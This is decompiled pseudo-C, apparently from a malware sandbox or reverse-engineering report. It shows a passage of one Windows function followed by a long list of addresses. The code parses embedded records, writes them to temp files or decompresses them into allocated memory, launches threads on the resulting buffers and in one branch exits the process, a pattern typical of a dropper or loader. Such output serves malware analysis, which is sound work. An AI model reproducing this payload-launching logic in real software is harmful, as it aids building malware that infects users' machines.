                                                                                                                                                                                                                                                                                          								_v36 =  *_v20;
                                                                                                                                                                                                                                                                                          								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                                          								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v13 = 0;
                                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                                          							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _v48;
                                                                                                                                                                                                                                                                                          							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                          								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                                                                                                          									_t448 = _v20;
                                                                                                                                                                                                                                                                                          									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                          									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											L90:
                                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                                                                                                          												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          													_v13 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												L95:
                                                                                                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                                                                                                          												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                                          												__eflags = _t452;
                                                                                                                                                                                                                                                                                          												_v48 = _t452;
                                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          												goto L93;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                          											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                          											goto L95;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											goto L90;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                                          										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          											_t528 = _v20;
                                                                                                                                                                                                                                                                                          											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                                          											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                                                                                                          												_t529 = _v20;
                                                                                                                                                                                                                                                                                          												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                                          												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                                          													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                                          													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                                          													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                          													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                                          													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                                          													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                                                                                                          														goto L24;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v1200 = 0;
                                                                                                                                                                                                                                                                                          													_v1204 = 0;
                                                                                                                                                                                                                                                                                          													_v1208 = _v56;
                                                                                                                                                                                                                                                                                          													_t333 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                          														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                                          														__eflags = _v1212;
                                                                                                                                                                                                                                                                                          														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                                          															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                                          															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                                          															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                                          																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                                          																_v1208 = _v1216;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _v1204;
                                                                                                                                                                                                                                                                                          													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                                          														L88:
                                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                                          														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                                          															goto L88;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                          														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          														_v1220 = _t340;
                                                                                                                                                                                                                                                                                          														__eflags = _v1220;
                                                                                                                                                                                                                                                                                          														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                                          															_t465 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                                          															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                          																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															_t539 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                          															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          															_v8 = 1;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													goto L89;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_v636 = 0;
                                                                                                                                                                                                                                                                                          												_v632 = 0;
                                                                                                                                                                                                                                                                                          												_v640 = 0;
                                                                                                                                                                                                                                                                                          												_t472 = _v20;
                                                                                                                                                                                                                                                                                          												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                                          													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          													_v636 = _t355;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                          													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          													_v644 = _t378;
                                                                                                                                                                                                                                                                                          													__eflags = _v644;
                                                                                                                                                                                                                                                                                          													if(_v644 != 0) {
                                                                                                                                                                                                                                                                                          														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                                          														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                                          														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                                          															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                                          															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          															_v636 = _t383;
                                                                                                                                                                                                                                                                                          															_t563 = _v20;
                                                                                                                                                                                                                                                                                          															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                          															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          																_v632 = _t386;
                                                                                                                                                                                                                                                                                          																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												__eflags = _v636;
                                                                                                                                                                                                                                                                                          												if(_v636 != 0) {
                                                                                                                                                                                                                                                                                          													_t473 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                                          													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                          														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t549 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                          													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          														_v1228 = _t361;
                                                                                                                                                                                                                                                                                          														_v648 = _v1228;
                                                                                                                                                                                                                                                                                          														_t551 = _v20;
                                                                                                                                                                                                                                                                                          														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                          															__eflags =  *_v648;
                                                                                                                                                                                                                                                                                          															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                          																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                          																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															 *_v648 = _v632;
                                                                                                                                                                                                                                                                                          															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														__eflags =  *_v648;
                                                                                                                                                                                                                                                                                          														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                                          															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                                          															_v652 = _t368;
                                                                                                                                                                                                                                                                                          															CloseHandle(_v652);
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t550 = _v20;
                                                                                                                                                                                                                                                                                          													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                          													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                                          														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                          											__eflags = _v620;
                                                                                                                                                                                                                                                                                          											if(_v620 == 0) {
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                                          											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                          											_v1224 = _t393;
                                                                                                                                                                                                                                                                                          											_v624 = _v1224;
                                                                                                                                                                                                                                                                                          											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                                          											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                                          											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v628);
                                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                          								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                          								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                          								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                          								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                          								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v608 = 0;
                                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                                          								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _t415;
                                                                                                                                                                                                                                                                                          								if(_t415 == 0) {
                                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                                          									__eflags = _v608;
                                                                                                                                                                                                                                                                                          									if(_v608 == 0) {
                                                                                                                                                                                                                                                                                          										CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                                          								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          								E04006C60();
                                                                                                                                                                                                                                                                                          								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                          								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          								_v616 = _t421;
                                                                                                                                                                                                                                                                                          								__eflags = _v616;
                                                                                                                                                                                                                                                                                          								if(_v616 == 0) {
                                                                                                                                                                                                                                                                                          									E04006CF0();
                                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E040074A0();
                                                                                                                                                                                                                                                                                          								ExitProcess(0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v60 =  *_v20;
                                                                                                                                                                                                                                                                                          							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                                          							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                                          							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                                          						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L99;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















































































                                                                                                                                                                                                                                                                                          0x040062b9
                                                                                                                                                                                                                                                                                          0x040062c4
                                                                                                                                                                                                                                                                                          0x04006c4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040062d4
                                                                                                                                                                                                                                                                                          0x040062d9
                                                                                                                                                                                                                                                                                          0x040062e0
                                                                                                                                                                                                                                                                                          0x040062f9
                                                                                                                                                                                                                                                                                          0x040062fc
                                                                                                                                                                                                                                                                                          0x0400630e
                                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                                          0x04006343
                                                                                                                                                                                                                                                                                          0x04006349
                                                                                                                                                                                                                                                                                          0x04006354
                                                                                                                                                                                                                                                                                          0x0400635d
                                                                                                                                                                                                                                                                                          0x04006363
                                                                                                                                                                                                                                                                                          0x04006429
                                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                                          0x0400636f
                                                                                                                                                                                                                                                                                          0x04006375
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400637b
                                                                                                                                                                                                                                                                                          0x04006381
                                                                                                                                                                                                                                                                                          0x04006384
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006391
                                                                                                                                                                                                                                                                                          0x04006393
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006399
                                                                                                                                                                                                                                                                                          0x0400639f
                                                                                                                                                                                                                                                                                          0x040063a2
                                                                                                                                                                                                                                                                                          0x04006419
                                                                                                                                                                                                                                                                                          0x0400641e
                                                                                                                                                                                                                                                                                          0x04006424
                                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                                          0x040063ad
                                                                                                                                                                                                                                                                                          0x040063c3
                                                                                                                                                                                                                                                                                          0x040063c6
                                                                                                                                                                                                                                                                                          0x040063ca
                                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                                          0x040063dc
                                                                                                                                                                                                                                                                                          0x040063e1
                                                                                                                                                                                                                                                                                          0x040063e4
                                                                                                                                                                                                                                                                                          0x040063ef
                                                                                                                                                                                                                                                                                          0x040063f4
                                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                                          0x04006408
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006320
                                                                                                                                                                                                                                                                                          0x04006325
                                                                                                                                                                                                                                                                                          0x0400632e
                                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                                          0x0400642e
                                                                                                                                                                                                                                                                                          0x04006438
                                                                                                                                                                                                                                                                                          0x0400643b
                                                                                                                                                                                                                                                                                          0x0400644d
                                                                                                                                                                                                                                                                                          0x04006450
                                                                                                                                                                                                                                                                                          0x04006453
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006459
                                                                                                                                                                                                                                                                                          0x0400645d
                                                                                                                                                                                                                                                                                          0x04006482
                                                                                                                                                                                                                                                                                          0x04006488
                                                                                                                                                                                                                                                                                          0x04006493
                                                                                                                                                                                                                                                                                          0x0400649c
                                                                                                                                                                                                                                                                                          0x040064a2
                                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                                          0x040065f9
                                                                                                                                                                                                                                                                                          0x040065fc
                                                                                                                                                                                                                                                                                          0x04006609
                                                                                                                                                                                                                                                                                          0x0400660f
                                                                                                                                                                                                                                                                                          0x04006bdd
                                                                                                                                                                                                                                                                                          0x04006be3
                                                                                                                                                                                                                                                                                          0x04006be9
                                                                                                                                                                                                                                                                                          0x04006c18
                                                                                                                                                                                                                                                                                          0x04006c1e
                                                                                                                                                                                                                                                                                          0x04006c24
                                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                                          0x04006c2a
                                                                                                                                                                                                                                                                                          0x04006444
                                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                                          0x04006bf1
                                                                                                                                                                                                                                                                                          0x04006bf7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006c01
                                                                                                                                                                                                                                                                                          0x04006c07
                                                                                                                                                                                                                                                                                          0x04006c0e
                                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                                          0x0400661b
                                                                                                                                                                                                                                                                                          0x04006621
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006633
                                                                                                                                                                                                                                                                                          0x04006638
                                                                                                                                                                                                                                                                                          0x0400663e
                                                                                                                                                                                                                                                                                          0x04006640
                                                                                                                                                                                                                                                                                          0x04006647
                                                                                                                                                                                                                                                                                          0x0400664a
                                                                                                                                                                                                                                                                                          0x0400664e
                                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                                          0x04006758
                                                                                                                                                                                                                                                                                          0x0400675b
                                                                                                                                                                                                                                                                                          0x040069cb
                                                                                                                                                                                                                                                                                          0x040069dc
                                                                                                                                                                                                                                                                                          0x040069ed
                                                                                                                                                                                                                                                                                          0x040069f2
                                                                                                                                                                                                                                                                                          0x04006a1a
                                                                                                                                                                                                                                                                                          0x04006a3c
                                                                                                                                                                                                                                                                                          0x04006a42
                                                                                                                                                                                                                                                                                          0x04006a49
                                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                                          0x04006a4f
                                                                                                                                                                                                                                                                                          0x04006a59
                                                                                                                                                                                                                                                                                          0x04006a66
                                                                                                                                                                                                                                                                                          0x04006a6c
                                                                                                                                                                                                                                                                                          0x04006a72
                                                                                                                                                                                                                                                                                          0x04006a75
                                                                                                                                                                                                                                                                                          0x04006b3c
                                                                                                                                                                                                                                                                                          0x04006a7b
                                                                                                                                                                                                                                                                                          0x04006a84
                                                                                                                                                                                                                                                                                          0x04006aa0
                                                                                                                                                                                                                                                                                          0x04006aa6
                                                                                                                                                                                                                                                                                          0x04006aad
                                                                                                                                                                                                                                                                                          0x04006ac5
                                                                                                                                                                                                                                                                                          0x04006aca
                                                                                                                                                                                                                                                                                          0x04006ad0
                                                                                                                                                                                                                                                                                          0x04006af6
                                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                                          0x04006b1c
                                                                                                                                                                                                                                                                                          0x04006b42
                                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                                          0x04006bc9
                                                                                                                                                                                                                                                                                          0x04006bd0
                                                                                                                                                                                                                                                                                          0x04006b4b
                                                                                                                                                                                                                                                                                          0x04006b51
                                                                                                                                                                                                                                                                                          0x04006b57
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006b60
                                                                                                                                                                                                                                                                                          0x04006b6d
                                                                                                                                                                                                                                                                                          0x04006b72
                                                                                                                                                                                                                                                                                          0x04006b75
                                                                                                                                                                                                                                                                                          0x04006b7b
                                                                                                                                                                                                                                                                                          0x04006b82
                                                                                                                                                                                                                                                                                          0x04006b84
                                                                                                                                                                                                                                                                                          0x04006b87
                                                                                                                                                                                                                                                                                          0x04006b8b
                                                                                                                                                                                                                                                                                          0x04006b99
                                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                                          0x04006ba1
                                                                                                                                                                                                                                                                                          0x04006ba7
                                                                                                                                                                                                                                                                                          0x04006baa
                                                                                                                                                                                                                                                                                          0x04006bb8
                                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                                          0x04006bc7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                                          0x04006761
                                                                                                                                                                                                                                                                                          0x0400676b
